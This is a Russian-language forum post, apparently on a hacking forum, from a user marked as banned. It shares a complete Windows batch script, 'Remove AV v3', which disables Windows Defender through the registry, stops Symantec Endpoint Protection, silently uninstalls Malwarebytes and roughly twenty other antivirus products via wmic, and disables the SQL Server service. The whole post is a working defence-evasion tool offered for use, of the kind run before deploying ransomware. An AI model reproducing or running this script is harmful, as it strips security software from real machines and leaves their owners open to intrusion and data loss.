Пожалуйста, обратите внимание, что пользователь заблокирован
Всем привет
Код:
@echo off
SETLOCAL
::--------------------------------------------------------------
:: Code
echo [*] ===[ Remove AV v3 ]===
call :StopService "mssqlserver"
call :Uninstall "office scan"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
"C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\smc.exe" -stop
"C:\Program Files\ Symantec Symantec Endpoint Protection\smc.exe" -stop
call :Uninstall "Malwarebytes"
"C:\Program Files\ Malwarebytes \Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart
call :Uninstall "webroot"
call :Uninstall "Symantec Endpoint"
call :Uninstall "endpoint protection"
call :Uninstall "Security Essentials"
call :Uninstall "McAfee"
call :Uninstall "VIPRE"
call :Uninstall "AVG"
call :Uninstall "Avira"
call :Uninstall "Bitdefender"
call :Uninstall "Comodo"
call :Uninstall "Avast"
call :Uninstall "Kaspersky"
call :Uninstall "Panda"
call :Uninstall "360 Total Security"
call :Uninstall "Sophos"
call :Uninstall "Nod32"
call :Uninstall "ESET"
call :Uninstall "Norton"
call :Uninstall "Symantec"
call :Uninstall "Norman"
echo [*] Done
exit /B %ERRORLEVEL%
::--------------------------------------------------------------
:: Functions
:: Kill Process by Name in Silent mode
:KillProcess
echo [*] Kill Process: %~1
taskkill /f /im %~1 /t /fi "status eq running" > nul
exit /B 0
:: Stop Service by Name in Silent mode
:StopService
echo [*] Stop Service: %~1
sc stop %~1 > nul
if "%ERRORLEVEL%"=="0" (
net stop %~1 > nul
sc config %~1 start= disabled
) else (
echo bad > nul
)
exit /B 0
:: Uninstall in Silent mode
:Uninstall
echo [*] Uninstall: %~1
wmic product where "name like '%%%~1%%'" call uninstall /nointeractive > nul
exit /B 0
Этакий компьютерный мастер из объявлений у подъезда
